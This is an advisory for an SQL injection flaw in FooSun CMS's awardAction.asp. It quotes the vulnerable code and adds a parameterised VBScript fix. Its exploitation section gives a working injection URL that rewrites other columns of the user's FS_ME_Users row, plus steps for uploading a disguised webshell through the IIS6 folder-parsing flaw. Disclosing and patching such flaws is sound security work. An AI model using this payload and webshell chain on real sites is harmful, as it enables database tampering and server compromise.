FooSun awardAction.asp page SQL injection vulnerability

Affected versions:
FooSun > 5.0

Software description:
FoosunCMS is a feature-rich content management system based on an ASP+ACCESS/MSSQL architecture.

Vulnerability details:


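In the file \User\award\awardAction.asp:

    Integral=NoSqlHack(request.QueryString("Integral")) ' line 14
    if action="join" then
        User_Conn.execute("Insert into FS_ME_User_Prize (prizeid,usernumber,awardID) values("&CintStr(prizeID)&",'"&session("FS_UserNumber")&"',"&CintStr(awardID)&")")
        ' get the current number of participants --------------------------------
        User_Conn.execute("Update FS_ME_Users set Integral=(Integral-"&Integral&") where usernumber='"&session("FS_UserNumber")&"'")

The program places Integral directly into the SQL statement. Although the value passes through the string-filtering function NoSqlHack, it is concatenated unquoted into a numeric expression and, unlike prizeID and awardID, is not passed through CintStr, so SQL injection is still possible. Exploiting this vulnerability allows data in the FS_ME_User table to be modified and, combined with system functionality, a webshell to be obtained.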
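A hardened form of the Integral update shown above, as an added example that is not FooSun's own code: the value is validated as a plain decimal integer and bound as a parameter instead of being concatenated. It assumes User_Conn is the open ADODB.Connection from the page; ParseNonNegativeInt and the usernumber parameter size of 50 are hypothetical.

```vbscript
' Added example (not FooSun code). ADO constants declared locally so the
' snippet does not depend on adovbs.inc being included.
Const adCmdText = 1
Const adParamInput = 1
Const adInteger = 3
Const adVarWChar = 202
Const adExecuteNoRecords = 128

' Hypothetical helper: returns the value as a Long, or -1 when the input is
' anything other than 1 to 9 decimal digits (no signs, spaces, commas, parentheses).
Function ParseNonNegativeInt(raw)
    Dim re
    Set re = New RegExp
    re.Pattern = "^\d{1,9}$"
    If re.Test(raw) Then
        ParseNonNegativeInt = CLng(raw)
    Else
        ParseNonNegativeInt = -1
    End If
End Function

Dim Integral, cmd
Integral = ParseNonNegativeInt(Request.QueryString("Integral") & "")
If Integral < 0 Then
    ' Reject instead of trying to clean the value up.
    Response.Status = "400 Bad Request"
    Response.End
End If

Set cmd = Server.CreateObject("ADODB.Command")
Set cmd.ActiveConnection = User_Conn   ' assumed: open connection from the page
cmd.CommandType = adCmdText
' Placeholders keep both values out of the SQL text entirely.
cmd.CommandText = "Update FS_ME_Users set Integral=(Integral-?) where usernumber=?"
cmd.Parameters.Append cmd.CreateParameter("Integral", adInteger, adParamInput, , Integral)
' Size 50 is an assumed column length for usernumber.
cmd.Parameters.Append cmd.CreateParameter("usernumber", adVarWChar, adParamInput, 50, Session("FS_UserNumber"))
cmd.Execute , , adExecuteNoRecords
Set cmd = Nothing
```

Binding closes the injection, but the amount deducted is still supplied by the client; taking it from the award record on the server side would remove that trust as well.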

Exploitation:

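After logging in as a registered user, request the URL:

http://www.sitedir.com.cn/User/award/awardAction.asp?action=join&awardID=1&prizeID=1&Integral=0),usernumber= 0x6C006C002E00610073007000,LoginNum=(1

Log out and log in again, then upload a webshell with the doc file extension. Combined with the IIS6 parsing flaw for folders named *.asp, this yields a webshell.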
